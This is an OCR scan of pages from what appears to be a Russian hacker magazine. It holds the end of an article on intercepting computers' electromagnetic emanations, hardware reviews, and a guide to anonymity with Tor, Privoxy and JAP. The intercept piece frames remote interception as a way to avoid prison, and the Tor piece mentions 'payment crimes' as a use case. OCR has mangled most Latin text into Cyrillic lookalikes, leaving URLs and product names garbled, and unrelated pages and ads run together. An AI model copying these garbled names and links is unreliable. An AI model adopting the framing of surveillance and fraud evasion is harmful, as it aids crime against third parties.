всегда легко найдешь схемы радиопередатчиков, которые, 
Іесли ты умеешь пользоваться паяльником, помогут тебе в 
дистанционной передаче данных, что сделает твою жизнь 
намного безопаснее и почти гарантированно избавит тебя 
от тюремной похлебки. В этом случае для обеспечения сво- 
ей безопасности необходимо установить мощную антенну 
и расположить приемник сигнала как можно дальше. Сове- 
тую заглянуть насайт ѵѵѵѵѵѵ.габізі.ігтигота.ги . 

Еще один, довольно неплохой и, на мой взгляд, более удобный 
способ сканирования (хотя бы в силу возможностей тонкой 
настройки и большей дальнобойности) — применение корот- 
коволновых трансиверов. Увы, но они стоят сравнительно до- 
рого (простенькие образцы — от 200-300 долларов). Но если 
ты — заинтересованный человек, то трансивер для тебя ока- 
жется настоящим кладом. С его помощью можно не только пе- 
рехватывать ЭМ-излучения, но и слушать секретные передачи 
— «морзянку», — и делать множество иных полезных и инте- 
ресных вещей . Но это уже совсем другая история. Интересный 
факт: белорусский радиотелефон «Алтай» (не знаю, выпуска- 
ется ли он сейчас), являясь, по сути, простым трансивером, об- 
ладает неплохими возможностями для радиоперехвата. 
Внимание! Если ты собираешься перехватывать информа- 
циютем методом, чтоописанвданной статье, вбольших объ- 
емах, то тебе просто необходима хорошая звуковая карта, 
уровень собственных шумов которой незначителен. Иначе 
головной боли от переутомления не избежать. Поэтому 
обязательно проверь с помощью утилиты РідІтіМагк Аисііо 
Апаіугег ( ИДр://аибіо.гідІі1тагк.ога/гиз ). подойдет ли твоя зву- 
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> Фильтр Едиаіііег избавит от шумов 

ковая карта для подобной деятельности в «промышленных» 
масштабах. 

О И напоследок... 

Если ты выполняешь на своем компьютере важную работу, 
требующую секретности, или обслуживаешь какой-либо 
сервер, то тебе просто необходимо иметь надежные средс- 
тва для защиты от утечки информации через электромаг- 
нитное излучение. А средства эти весьма разнообразны: 
фильтрация, заземление приборов, экранирование, элек- 
тромагнитное зашумление и так далее. Эти средства будут 
оправданны, ведь существуют способы снятия сигнала 
даже с монитора компьютера-жертвы, то есть возможность 
получения достоверной картины работы пользователя за 
компьютером. Лучший способ узнать все о грозящей опас- 
ности - это понять принцип реализации атаки и опробовать 
ее на практике. Удачи! ос 



ВАН ЭЙК И ЕГО ПРИБОР 

8 В 1 985 году группа шведских ученых во главе с Вильямом 
Ван Эйком представила на суд общественности статью, в 

( которой были изложены основные принципы перехвата 
информационного потока, передающегося с электромаг- 

І нитным излучением, его декодирование и приведение в 
вид, понятный пользователю (эта идея была выдвинута 
| ученым Доном Бриттоном в 1979 году, но тогда никто не 
обратил на нее внимания). Идея Ван Эйка заключалась в 
дополнении обычного телевизора таким образом, чтобы 
тон выдавал изображение, с которого ведется перехват. 
| Прибор искусственно создавал синхронизирующий сиг- 

І нал при помощи двух осцилляторов (для вертикальной 
и горизонтальной синхронизации). Радиус его действия 
— около 1 километра (при условии использования специ- 
альной антенны для лучшей фокусировки). Самое инте- 
І ресное заключается в том, что этот прибор мог собрать 
'любой радиолюбитель средней квалификации. Сумма, 
|которую было необходимо потратить на закупку деталей, 
|ТОже являлась чисто символической — около $15. 



>Вся информация, 
содержащаяся в 
статье, дана для 
ознакомительных це- 
лей. За незаконное 
применениематериа- 
ла ответственность 
несешь только ты. 

>Облегчение поиска 
нужных фрагментов- 
ключей. 

> Если ты затрудня- 
ешься с поиском 
нужных фрагмен- 
тов или даже не 
можешь отделить 
шум от полезного 
сигнала — попробуй 
увеличить уровень 
звука на 4-6 дБ 
(в«"І\ІегоѴѴаѵеЕсІі{ог» 

-е выбери «Ѵоіите- 
>ѴоІите сИапде»). 
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>СО/В\Ю 

На нашем диске ты 
найдешь программу 
«ПідІтіМагк Аисііо 
Апаіугег», упоминав- 
шуюся в статье. 
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О-Ыпк РІ-І.В604 



Аппаратный роутер с двумя ѴУАЫ-портами и возмож- 
ностью балансировки нагрузки между ними 



Т ехнические характеристики: 

Интерфейсы: 2х\/ѴАІЧ (РЫ-45) Ю/ЮОМбит/сек, 4хІ_АІЧ (РЫ-45) 10/100Мбит/сек 
Функции роутера: ІЧАТ/ІЧАРТ, Ассѳзз Сопігоі, ОупОІЧЗ, ОоЗ 
Функции файрвола: ОоЗ,ЗРІ, Ріпд оШеаф РоДЗсап, Раске! РіІІег, ШІ_ВІоск 
Дополнительно: ѴРІЧ Разз-ТИгоидИ, І_оасІ-ВаІапсе 



ниѳм РРТР-соѳдинѳния. Так что надеемся на скорое обновление микро- 



программы. _ 



ЗЙ8Г 




,ТЕЗТ_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ ОБО- 
РУДОВАНИЕ КОМПАНИЯМ МЕРНОЙ (Т.(495) 739-0959, ѴѴѴѴѴѴ.МЕВЫОІЧ 
Я II), ПИРИТ (Т.(495) 785-5554, ѴѴѴѴѴѴ.РІРІТ.ВІІ), МАКЦЕНТР (Т.(495) 737- 
3366, ѴѴѴѴѴѴ.МАССЕІЧТЕР.РО), РОССИЙСКИМ ПРЕДСТАВИТЕЛЬСТВАМ 
КОМПАНИЙ МЫЗТЕК, О-ЫІЧК И ЗСУТНЕ, МОСКОВСКОМУ ПРЕДСТАВИ- 
ТЕЛЬСТВУ КОМПАНИИ РСЗАРЕ (ѴѴѴѴѴѴ.РСЗАРЕ.ВІІ), А ТАКЖЕ ЕВРО- 
ПЕЙСКОМУ ПРЕДСТАВИТЕЛЬСТВУ КОМПАНИИ ЗСУТНЕ. 




О-Ыпк ОГІ.-210 



Аппаратный файрвол 



Т ехнические характеристики: 

Процессор: ІпіеІ ІХР422 266 МГц 
Оперативная память: 1 28 Мб ЗОЛАМ РС1 33 

ПЗУ: 4 Мб РІазИ ІпіеІ ТЕ28Р320 + 1 28 Мб Т гапзсепб Сотрасі РІазИ Сагб 
Интерфіейсы: ІхѴѴАІЧ (ВЧ-45) 10/100Мбит/сек, 1хОМ2(ВФ45) 10/100Мбит/ 
сек, 4хІ_АІ\І (ВФ45) 10/100Мбит/сек 

Функции фіайрвола: ЗРІ, ОоЗ, Раске! РіІІег, Сопіепі РіІІег, ІСМР РіІІег 



1/ Сердцем устройства является Іпііпеоп АОМ5120Р. Частота проца 
— 1 75 МГц, производительность — 227 Мірз. 

2/ Оба порта ѴѴАІЧ могут работать как по отдельности, так и в качестве 
Ьаск-ир друг друга. 

3/ Реальная пропускная способность каждого из ѴѴАІЧ-интерфейсов (с 
использованием функции трансляции портов ІЧАРТ) составляет около 45 
Мбит/сек, то есть находится на одном уровне с моделями 01-704/804. 

4/ Есть возможность балансировки исходящего трафика между ѴѴАІЧ- 
портами. Таким образом, при наличии двух каналов в интернет, можно 
использовать их как 1 виртуальный. 

5/ Функция ІгаІІіс збаріпд (ОоЗ) позволяет также разделять трафик по 
приоритетам, таким образом ускоряя отправку наиболее важной инфор- 
мации. 

6/ За свои деньги 0-І_іпк 01-1_В604 является очень интересным и, надо 
сказать, инновационным решением для домашних сетей. 



1 / В меню настройки отсутствует такая полезная функция, как «ріпд» , что 
несколько затрудняет процесс беЬид’инга. 

2/ С заводской прошивкой у роутера имеется ряд проблем с установле- 



1 / Данный межсетевой экран предназначен для использования неболь- 
шими организациями и отдельными энтузиастами, для которых необхо- 
дим безопасный доступ в интернет. 

2/ Пропускная способность ѴѴАІЧ-интерфейса очень высока и составля- 
ет, по нашим тестам, порядка 70 Мбит/сек (при задействовании функции 
трансляции портов ІЧАРТ). 

3/ На тыльной стороне файрвола находится СОМ-порт, позволяющий 
настраивать устройство через консоль. 

4/ ѴѴеЬ-интерфейс настройки достаточно хорошо продуман и позволяет 
максимально эффективно использовать всю мощь и функциональность 
брэндмауэра. Однако требуется довольно высокий уровень подготовки 
пользователя. 

5/ Имеется возможность поднятия ѴРКІ-сервера. Поддерживаются про- 
токолы ІРЗес и І_2ТР. Разумеется, О-Ыпк ОРІ_-2Ю может выступать и в 
роли ѴРІЧ-кпиента. 

в/ Встроенный 5-портовый коммутатор является управляемым и позволя- 
ет создавать виртуальные сети (ѴІ_АІЧ) и выделять демилитаризованную 
зону (0М2). 

7/ Механизмы обнаружения и предотвращения вторжений предполага- 
ют использование баз данных, которые регулярно обновляются на сайте. 
О-Ыпк ОРІ_-2Ю может выкачивать и сохранять эти обновления на своей 
флэшке. 
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Сооіег Мазіег СМ Зіаскег 830^НЕ-1еп С500 



Уникальный алюминиевый корпус — мечта моддера и 
энтузиаста 

Т ехнические характеристики: 

Блок Питания: нет 

Размеры: 250 х 536 х 638 (Ш х Д х В) 

Материал: алюминий 
Цвет: серебристо-черный 

Поддерживаемые материнские платы: Е-АТХ, АТХ, т-АТХ, ВТХ, т-ВТХ, 
рісо-ВТХ 

Количество 5.25 отсеков: 9 шт 
Количество 3.5 отсеков: 4 шт 

Формат поддерживаемых БП: Стандарт АТХ Р32 



1 / Использовано нестандартное решение: датчики, индикаторы, атакже 
кнопки переключения находятся на верхней панели. 

2/ Передняя дверца открывается мягко, а для наилучшей вентиляции по 
периметру установлены металлические решетки. 

3/ К корпусу прилагается богатая комплектация: в наборе, помимо вин- 
тов, мануала и крепежей, присутствует трубка воздуховода и металли- 
ческая подложка под материнскую плату. 

4/ Уже установлены в корпус (на задней и передней панели) два 1 20 мм 
вентилятора. 

5/ Внутри имеется дополнительная передвижная створка с возможнос- 
тью установки четырех 1 20 мм. 




1 / Боковые стенки снимаются с двух сторон корпуса, но этот процесс 
занимает много времени: их очень сложно ставить обратно. 

2/ Не предусмотрены специальные колеса для передвижения корпуса. 




Коммуникатор с СРЗ-приемником 

Т ехнические характеристики: 

Операционная система: ѴѴіпбоѵѵз МоЬіІе 5.0 
Процессор: Затзипд ЗЗС2440А 400 мГц ОЗУ: 64 Мб 
Встроенная флэш: 128 Мб 
Дисплей: 320x240 точек; 2,8" 

Коммуникации: ОЗМ/ОРВЗ/850/900/1 800/1 900 МНг, ВІиеІооіН ѵ2.0 

Слоты расширения: МіпіЗО 

СРЗ-приемник: ЗіРР Зіаг III 

Аккумулятор: Шоп 1440 мАч 

Дополнительно: 1 ,3 Мпс-камера 



1 / Производительность процессора Затзипд очень высока. 

2/ В комплекте поставляется полнофункциональная версия РоскеЮРЗ 
Рго Мозсоѵѵ, что позволяет москвичам сразу же испытать функцию ОРЗ- 
навигации по городу. 

3/ Комплектация также включает в себя крепеж для автомобиля и кабель 
питания от прикуривателя. 

4/ Время автономной работы в стандартном режиме (40% подсветки, 15-20 
минут разговоров, чтение книг, мпЗ-плеер) составляет около 3-3,5 часов. 

5/ Диапазона регулировки яркости подсветки хватает для комфортной 
работы как при ярком освещении, так и в темноте. 

Б/Учитывая невысокую стоимость, хорошую функциональность и комп- 
лектацию, Е-Іеп Ѳ500 станет отличным выбором для тех, кому необходим 
телефон, КПК и (ЗРЗ в одном устройстве. 

7/ Имеется встроенный РМ-тюнер. 



1 / Имеется ряд проблем совместимости с некоторыми приложениями. 
2/ Отсутствует модул ь ѴѴі-Рі, так горячо любимый многими хакерами. 

3/ Джек для подключения наушников имеет нестандартный размер в 
2.5", что затрудняет использование «ушей» от сторонних производителей. 
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РС5аІе Яесоѵегу СагсІ 



Мизіек МР70В 






Девайс для защиты и восстановления данных 



Портативный ОѴР-плеер 



Системные- треБования: 

Процессор: от 486 и выше 
Оперативная память: 1 6 Мб или выше 
Жесткий диск: РАТА, ЗАТА, ЗС5І 
Прочее: один свободный слот РСІ 



1 / Будучи установленная в материнскую плату Віозіаг ТРогсе4 11775 на 
чипсете І\І1огсе4 ЗРР Шга, РСІ-карта не смогла заработать, поэтому сле- 
дует учитывать возможность аппаратных конфликтов при использова- 
нии комплекса с последним «железом». Надеемся, будет исправ- 

лено і^ювых версиях прошивки. 



Т ехнические характеристики: 

Дисплей: 7” І_Сй 

Поддерживаемые форматы: йѴО, МРЕ04, йіѵХ (ОіѵХЗ.1 1 , 4.0, 5.x) ХѵісІ, АѴІ, 
Кобак Рісіиге Сй и 6РЕО. 

Аккумулятор: ІЧІ-МН 3100 тАИ 



1 / Программы для восстановления/сохранения данных «зашиты» в РСІ- 
плату, для управления которой прилагается специальный драйвер. 

2/ Изменения, которые сделал хакер на защищенном диске, сохраняют- 
ся в специально выделенный буфер (размер можно регулировать). В за- 
висимости от настроек они будут уничтожены либо после перезагрузки 
компа, либо через определенное время. 

3/ Таким же образом можно защитить данные СМОЗ или блокировать 
порты ввода/вывода жестких дисков. 

4 / Конфигуратор устройства защищается паролем. 

5/ Есть два основных режима работы: защищенный режим, где запрещено 
вносить какие-либо изменения в установки, и открытый режим, при котором 
мониторинг изменений не производится, так что его можно использовать 
для создания последней версии точки отката. 

6/ Возможно кому-либо пригодится функция вывода графического изобра- 
жения в формате ВМР при загрузке компьютера. 

7/ Такой девайс хорошо использовать для защиты от хакеров, детей, школь- 
ников, жен, вирусов, деструктивно настроенных ламеров. Теперь не придет- 
ся каждый раз восстанавливать после них систему на работе и дома. 



1 / Мизіек МР70В поставляется в богатой комплектации: адаптер, съемный 
аккумулятор, шнур питания от автомобильного прикуривателя, АѴ-кабель 
для подключения к телевизору, пульт дистанционного управления и удоб- 
ная сумка. 

2/ Девайс может работать как от автомобильного прикуривателя, так и с 
помощью перезаряженного аккумулятора. 

3/ Для большего удобства Мизіек МР70В снабжен встроенным кардриде- 
ром ЗО/ММС для просмотра фотографий или фильмов с карты памяти. 

4 / Меню хоть и на английском языке, но все равно интуитивно понять мож- 
но, и каких-либо сложностей в работе с ним возникнуть не должно. 

5 / Встроенный антишок работает отменно, и даже на плохой дороге, когда 
машину трясет, видео не прерывается. 

6/ Корпус имеет небольшой размер и легкий вес. 

7/ Претензий кчтению дисков нет. Если на компьютере записать 5-6 филь- 
мов МРЕ64 на 0\Ю, то девайс с легкостью прочтет его и с помощью меню 
предложит выбрать фильм для просмотра. 



1 / Слабая мощность встроенных колонок. 
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ПЕРЕКРЕСТНЫЙ ОГОНЬ! 



Компьютер ФРОНТ Т-90 на базе графического 
адаптера АТІ СгоззРіге - это новый уровень мощности 
и скорости, который дает возможность по-настоящему 
насладиться последними пост и жа»у<мми ЛР - г п а гЬ и к и . 







СоругідНІ 2005, АТІ ТесГіпоІодіез Іпс. АН гідНІз гезегѵесі. АТІ, ТИе АТІ Іодо, апсі АТІ ргосіисі апсі ргосіисі Іеаіиге апсі/ог гедізіегесі Ігасіетагкз оі АТІ 
ТесГіпоІодіез Іпс. АН оІГіег сотрапу апсі ргосіисі патез аге Ігасіетагкз апсі/ог гедізіегесі Ігасіетагкз оіпатез аге ІгасІетагкзІГіеіг гезресііѵе оѵѵпегз. 



РЕКЛАМА 






Компактная акустическая система 2.1 с плоским са- Охлаждающая глушилка для винта 
бвуфером 



Т ехнические характеристики: 

Выходная мощность: 80 Вт 
Саввуфер: 50 Вт 
Сателлиты: 2x1 5 Вт 

Диапазон воспроизводимых частот: 35 Гц - 20 КГц 
Экранирование корпуса: магнитное 

Управление с пульта д/ у: громкость, высокие частоты, низкие частоты, 30 
Вес: 8,5 кг 




1/ Сабвуфер действительно очень компактный, во многом благодаря 
тому, что динамик вынесен наружу. 

2/ Вся система с легкостью умещается на небольшом рабочем столе, 
что позволяет ее применять даже в очень стесненных условиях. 

3/ Внешний вид сателлитов и сабвуфера также заслуживает отдельной 
похвалы. Несмотря на свои компактные размеры, данная система не 
производит впечатления дешевых китайских пищалок. 

4 / Всеуправление звуком возможно с проводного пульта д/у (дли на про- 
вода около 1,5 м). 

5/ Сабвуфер отыгрывает свою часть очень достойно. Бас довольно чис- 
тый и глубокий, без явных перегрузок и гула. 

6/ За свои деньги модель играет сравнительно неплохо. Однако если 
расширить круг выбора акустикой 2.0, то тут, пожалуй, единственным 
достоинством данной системы останутся только малые габариты. 




Т ехнические характеристики: 

Поддерживаемые Н00: 5АТА и РАТА жесткие диски формата 3,5 дюйма 
Размеры, мм: 145x198x36 
Масса, кг: 0,8 




1 / Кейс состоит из двух алюминиевых корпусов внутреннего и наружно- 
го. Наружный корпус окрашен в черный цвет и монтируется в 5,25 дюй- 
мовый отсек компа. 

2/ Пространство между корпусами заполнено шумоизолирующим мате- 
риалом, который еще должен гасить вибрации, возникающие при работе 
накопителя. 

ЗУДля отвода тепла от жесткого диска в комплект входят два термоков- 
рика, которые следует расположить сверху и снизу внутренней оболоч- 
ки, — тогда наружная будет исполнять роль радиатора. 

4 / Для подключения ЗАТА-винчестера в комплект входит удлинитель 
интерфейсного и силового кабеля, а для РАТА-накопителя в комплекте 
имеется только удлинитель силового шнура. 

5 / При тестировании винчестера ѴѴезІегп Оіді!аІ Ѵ\Ю5000ѴЗ вне кейса 
отчетливо прослушивались шумы, возникающие при перемещении маг- 
нитных головок, а максимальная температура оказалась равна 47 гра- 
дусам. После установки ЬЮй в кейс шумы можно было различить, лишь 
приложив ухо к коробке, а температура понизилась до 46 градусов. 




1 / Из недостатков устройства можно выделить некоторую сложность 
инсталляции винчестера в кейс. 



1 / При субъективном прослушивании можно отметить явную нехватку 
средних частот и специфический окрас высоких частот. 

2/ Имеется функция расширения стереобазы (ЗО), при включении ко- 
торой характер звучания немного изменяется, но нельзя сказать, что в 
лучшую сторону. 








КАЖДЫМ МОЖЕТ СТАТЬ ГЕРОЕМ, 

предложив 
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НЕСТАНДАРТНЫЕ МЕТОДЫ СОХРАНЕНИЯ АНОНИМНОСТИ 






□ Приватный симбиоз 

Когда речь заходит об альтернативе ѴРІЧ, то 
первое, что приходит на ум, — это, пожалуй, 
ЗЗН-туннелирование. Прием очень хорош, 
прост в эксплуатации, но требует некоторых 
усилий и минимальных вложений. На страни- 
цах «Хакера» мы многократно рассказывали 
о его реализации, поэтому повторяться не 



/ озо 



будем. А коснемся сегодня двух совершенно 
других подходов, абсолютно не похожих на то, 
что мы использовали ранее. 

Первый из них основывается на использовании 
сразу двух утилит: Тог и Ргіѵоху. Первую мы бу- 
дем использовать в качестве средства для шиф- 
рования трафика и сохранения анонимности, а 
вторую — как мощный инструмент для фильтра- 



ции данных, передаваемых по НТТР(3)-протоко- 
лу, который будет скрупулезно удалять всю ком- 
прометирующую информацию, передаваемую 
твоими клиентскими приложениями. 

Сказать, что Тог — это необычное приложе- 
ние, — значит ничего не сказать. Поверь, это 
настоящийуникум. Принцип обеспечения ано- 
нимности строится на базе распределенной 



НАУЧЕННЫЕ ГОРЬКИМ ОПЫТОМ, ХАКЕРЫ ИСПОЛЬЗУЮТ 
ѴРІЧ-СОЕДИНЕНИЕ. НЕ СЕРВИС, А НАСТОЯЩАЯ НАХОДКА: ^ 

И ТРАФИК НЕПРЕРЫВНО ШИФРУЕТ, И АНОНИМНОСТЬ ГА- 
РАНТИРУЕТ. ПО КРАЙНЕЙ МЕРЕ, ПО СЛОВАМ ТЕХ, КТО ЭТОТ 
СЕРВИС ПРЕДОСТАВЛЯЕТ. НА ПРАКТИКЕ ВСЕ МОЖЕТ ОКА- 
ЗАТЬСЯ ИНАЧЕ: ВДРУГ, ОТКУДА НЕ ВОЗЬМИСЬ, НА СЕРВЕРЕ 
ПОЯВЯТСЯ ВНУШИТЕЛЬНОГО РАЗМЕРА ЛОГИ, А ПОТОМ И 
ВОВСЕ ВЫЯСНИТСЯ, ЧТО СЕРВИС КОНТРОЛИРУЕТСЯ КОМ- 
ПЕТЕНТНЫМИ ОРГАНАМИ. И РАД БЫ Я, ЕСЛИ ВСЕ ЭТО БЫЛО 
ПЛОДОМ МОЕГО БОЛЬНОГО ВООБРАЖЕНИЯ. ТАК ВЕДЬ НЕТ 1 
— РЕАЛЬНЫЙ ПРИМЕР ИЗ ЖИЗНИ! ПОСЛЕ ТАКИХ ИНЦИ- 
ДЕНТОВ НАЧИНАЕШЬ ЗАДУМЫВАТЬСЯ ОБ АЛЬТЕРНАТИВЕ 
ЭТОМУ САМОМУ ѴРІЧ-СЕРВИСУ. 



ХАКЕР 08 /92/ 06 





I I 1 СЕТЕВОЙ КАМУФЛЯЖ 
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> Список нодов и маршрут следования 
пакетов на карте мира 



1 и 

Ч 



системы серверов, так называемых нод, между которыми 
в зашифрованном виде передаются данные. Для соедине- 
ния обычно используется три сервера, которые образуют 
временную цепочку. Каждый сервер выбирается случай- 
ным образом, при этом он знает только то, от какого зве- 
на получил данные и кому они предназначаются. Даже в 
случае перехвата данных на одном из серверов отследить 
полный маршрут пакетов (в том числе и их отправителя) 
не представляется возможным. Но это еще не все. Перед 
отправлением пакет последовательно шифруется тремя 
ключами: сначала для третьей ноды, потом для второй и, в 
конце концов, для первой. Когда первая нода получает па- 
кет, она расшифровывает «верхний» слой шифра и узна- 
ет, куда отправить пакет дальше. Второй и третий сервер 
поступают аналогичным образом. 

Как только цепочка выбрана, можно начинать передавать 
данные. Чтобы система не шла в ущерб скорости, одна це- 
почка используется в течение 1 0 минут, и только после это- 
го периода происходит перестроение. Теперь о том, что 
через этот туннель можно запустить. Тог работает только 
с ТСР-потоками и может быть использован любым прило- 
жением, работающим через 80СКЗ. На случай, когда в 
программе нельзя явно указать прокси, пригодятся соксо- 
фикаторы, такие как ЗоскзСар ( ѵѵѵѵѵѵ.зоскз.регтео.сот Т 
РгееСар ( ѵѵѵѵѵѵТгеесар.ги ) или Регтео Ргетіит Адеп{ ( ѵѵѵѵѵѵ. 
регтео.сот/ргосіисіз/ргетіит адепШтП . работающий 
на уровне драйвера. 

Столь хитроумный способ передачи данных придумали 
программисты по федеральному заказу военно-морских 
сил США. Долгое время система была закрыта для сво- 
бодного использования и предназначалась для ограни- 
ченного числа правительственных организаций и служб. 
Но теперь прелестями Тог’а можешь воспользоваться и ты 
— не упускай такую возможность. 

Теперь что касается Ргіѵоху. По сути, это обыкновенный 
НТТР-прокси, но с офигенными функциями фильтрования 
трафика, используемыми для обеспечения анонимности 
пользователя, динамического изменения содержания веб- 
страниц, управления соокіез, ограничения доступа к неко- 
торым сайтам и удаления рекламы, баннеров, всплываю- 
щих окон и зруѵѵаге. Любые действия по фильтрации могут 
быть четко запрограммированы с помощью внутренней 
системы правил. Для нас важно то, что Ргіѵоху анализиру- 
ет НТТР-заголовки и подменяет их в случае необходимости 
согласно заданному набору рулесов для предотвращения 
передачи в заголовках какой-либо компрометирующей 
информации. В том числе «снимка» сессии пользователя, 
по которой впоследствии его можно будет идентифициро- 
вать среди множества других клиентов. 




> С помощью такого конструктора можно 
наладить автоматическое изменение 
любых параметров НТТР-запроса 

О Надеваем камуфляж 

Раньше, когда Тог только появился, приходилось долго и 
нудно ковыряться с текстовыми конфигами Ргіѵоху и Тог. 
Сейчас все значительно проще: неофициальном сайтеТог 
( НДр:/Аог.еЛ.огд/іпбех.НітІ.гіЛ доступен готовый пакет, со- 
стоящий из непосредственно самого Тог, Ргіѵоху, а также 
Ѵібаііа, графической оболочки для управления системой. 
Во время установки трогать вообще ничего не надо: все 
заинсталлится и без твоей помощи. После завершения 
процесса не спеши искать ярлычок Тог’а и запускать его. 
Поскольку мы установили ОІЛ-оболочку для управле- 
ния программой, то стартовать нужно именно ее. В трее 
появится зеленая перечеркнутая луковица. Это значит, 
что сервис отключен. Щелкни правой кнопкой мыши по 
ее изображению и в меню выбери Зіагі После этого про- 
грамма полезет в инет(о чем, вероятно, завопит файрвол), 
чтобы обновить список нодов. По сути, уже сейчас можно 
работать — Тог по умолчанию работает как ТСР-прокси на 
9050 порту. То есть можно прописать его в браузере и про- 
верять его боеспособность, но спешить не стоит. 

Если программа не поддерживает протокол зоскз4а, и в 
качестве прокси-сервера указан непосредственно свой 
Тог-клиент (по умолчанию ІР 127.0.0.1 и порт 9050), то она 
попытается самостоятельно определить ІР-адрес запра- 
шиваемого сервера. Скорее всего, для этого она отправит 
запрос на ОЫЗ-сервер твоего настоящего интернет-про- 
вайдера. А это мало того, что спалит тебя прову, так еще и 
выдастудаленному серверу используемый тобою ЭИЗ (ко- 
торый наверняка находится в подсети провайдера). Про- 
верить возможность такого исхода несложно, если зайти 
через прокси на сайт ѵѵѵѵѵѵ.сІпззІиІІ.сот/ІооІз/аЬоиІѵои.сІт 
и увидеть адрес своего ОЫЗ-сервера. Но не зря же мы ста- 
вили Ргіѵоху — именно она поможет избежать подобного 
исхода. Тем более что чудо-прокси изначально настроена 
на работу в связке с Тог’ом, поэтому разбираться с ее хит- 
роумными правилами и конфигурацией тебе не придется. 
Достаточно запустить ее. 

После этого на 8118 порту приютится прокси, которая 
будет резать все то, что может тебя выдать, и далее пе- 
ренаправлять Тог’у. Для большего удобства рекомендую 
установить к РігеТох’у плагин — ТогВиДоп ( ѵѵѵѵѵѵЛгееІтаѵеп. 
пеД-здиігезЛогЬиДопЛ . Теперь включать и выключать 
работу Тог’а ты сможешь одной кнопкой мыши. Сущест- 
вует даже специальный набор ТогРагк ( ІтДрѴЛгееІтаѵеп. 
пеі/~аггакізЛограгк.Іт1тП . состоящий из Рігеіох’а и Тог’а, ко- 
торый можно запустись с флешки. Проверить работоспо- 
собность системы несложно: достаточно зайти на сервис 
ѵѵѵѵѵѵ.ір2Іоса1іоп.сот и посмотреть, какую информацию 
выдаст сайт о твоем месторасположении. Поверь мне: 




какая система лучше 
всего подходит для соб- 
людения анонимности? 
Отвечаю: Апопупт ОЗ 
( ІтДрѴ/зоигсеІогде.пеі/ 
ргоіесіз/апопѵт-оз/ ). 
Операционка постро- 
ена на базе ОрепВЗЭ 
и изначально настро- 
ена на прозрачное 
шифрование трафика, 
а также сохранение 
анонимности. В том 
числе средствами Тог. 
Другие ОС для аноним- 
ного серфинга: ЕДЕ 
( ѵѵѵѵѵѵ.погіітегпзесигііѵ. 
пеШоѵѵпІоасІ/еІеЛ . 

ѴігіиаІ Ргіѵасу МасЫпе 

( ѵѵікі.погеріѵ.ога/погеріѵ/ 

ѴігіиаІРгіѵасѵМасІтіпе ). 

РбапЮтЬ ДІтДр:// 

рНапіотіх.ѵДегпІтадеп.сІеЛ 




> ІтДр:/Лог.еЛ.огд/ 

— официальный сайт 
Тог. 

ѵѵѵѵѵѵ. ргіѵоху. ога 

— домашняя страни- 
ца Ргіѵоху. 
ѵѵѵѵѵѵ.ѵісіаііа-ргоіесі. 
пеі — удобная ОІЛ- 
оболочка для управ- 
ления Тог. 
ІтДр://ргіѵасѵ.Ітго.огд 

— сайт о приватнос- 
ти и независимости 
частной жизни в сети. 
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своего настоящего ІР-адреса и название род- 
ного провайдера ты там не увидишь, а также и 
упоминания о прокси, поскольку в заголовках 
соединения отсутствуют все указывающие на 
это переменные окружения: 
НТТР.РОРѴѴАРОЕО: (попе) 
НТТР_Х_РОЯѴѴАРЮЕО_РОВ: (попе) 

Программа Ѵісіаііа предоставляет несколько 
других интересных фишек системы. С помо- 
щью ВапсІѵѵісШі Огаріі ты можешь отслежи- 
вать сетевую активность системы. Окошко 
Меззаде І_од содержит информацию о де- 
ятельности Тог’а и возникающих ошибках. 
Хит сезона — пункт Ѵіеѵѵ ІЧеІѵѵогк, в котором 
отображается информация о нодах системы, 
а также на карте графически отображается 
передвижение твоих пакетов. Через панель 
Сопіідиге можно подключить русский язык к 
Ѵісіаііа, предварительно закачав файл лока- 
лизации (ИДрѴДгас.ѵісІаІіа-ргоіесІ.пеі/Ьгоѵѵзег/ 
Ігипк/згс/Іапд/ѵісІаІіа_ги.!з). 

Вообще, такая система предоставляет тебе 
кучу плюсов в работе. Помимо постоянно шиф- 
рованного соединения, ты получаешь безот- 
казный аниномайзер. Больше не нужно искать 
прокси и соксы, которые могут вести логи и к 
тому же дохнут как мухи. Правда, возникает 
вопрос: что делать, если существует необхо- 
димость придерживаться постоянного место- 
расположения? Например, при совершении 
платежных злодеяний или посещении ресур- 




> Меню (3111-оболочки для управления 
Тог’ом 
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> Уровень анонимности на нуле — необхо- 
димо выбрать сервер 

сов, которые позволяют отправлять свой тра- 
фиктолько юзерам определенной страны. Для 
этого в конфигурационном файле Тог — іоггс 
— можно использовать специальную дирек- 
тиву ЗІгісІЕхіІІЧосІез 1 , обозначающую исполь- 
зование на выходе жестко заданных нодов. А 
сами ноды задать через директиву ехйпосіез: 
ехііпобез имя_нода1 , имя_нода2 и т.д. Чтобы 
не делать это вручную, один из разработчи- 
ков ТОР придумал утилиту — ІЧосІеЫоск (Нйр:// 
запсІоз.аіІі.сх/~ЬасІдег/посІеЫоск.ІіітІ), которая 
самостоятельно подбирает список, используе- 
мых ОКІІОІЧ Роиіег'ов (другое название нодов) по 
географическому месторасположению. 

□ Анонимность по-немецки 

В одном из немецких институтов был разрабо- 
тан довольно хитрый способ сохранения ано- 
нимности. В систему пользователя устанавли- 
вается специальная прокси-программа 4АР 
(И1ір://апоп.іпЕіи-сІгезсІеп.сІе/іпсІех_еп.ІіітІ), 
которая принимает все запросы пользовате- 
ля на подключения, криптует и в безопасном 
режиме отправляет на специальный проме- 
жуточный сервер (так называемый 
микс). Фишка в том, что микс одно- 
временно используетогромное коли- 
чество пользователей, причем сис- 
тема построена так, чтобы каждый из 
них был неразличим для сервера. А 
поскольку все клиенты одинаковые, 
то и вычислить конкретно одного 
пользователя не представляется 
возможным. Миксы обычно устанав- 
ливаются на добровольных началах, 
в основном в университетах, и офи- 
циально подтверждают, что не ведут 
никакихлогов. 

Участие пользователя в настройке 
системы минимально — по сути, ему 
нужно установить ^Р-прокси и вы- 
брать правильный микс. На момент 
написания статьи в программе до- 
ступно 5 анонимных серверов. Для 




4 / 



каждого из них выводится различная инфор- 
мация об одновременном количестве пользо- 
вателей. Выбор обычно неоднозначен: так как 
чем больше пользователей, тем больше ано- 
нимности, но и меньше скорость соединения 
(ресурсы сервера небезграничны). С другой 
стороны, можно добиться большей скорости, 
выбрав менее популярный сервис, но проиг- 
рать по уровню безопасности. Кстати говоря, 
степень анонимности отображается с помо- 
щью специальной шкалы. 

Что особенно прикольно, так это полная сов- 
местимость с нодами Тог'а. Закачав с помо- 
щью самойже программы список промежуточ- 
ных серверов, можно смело их использовать. 
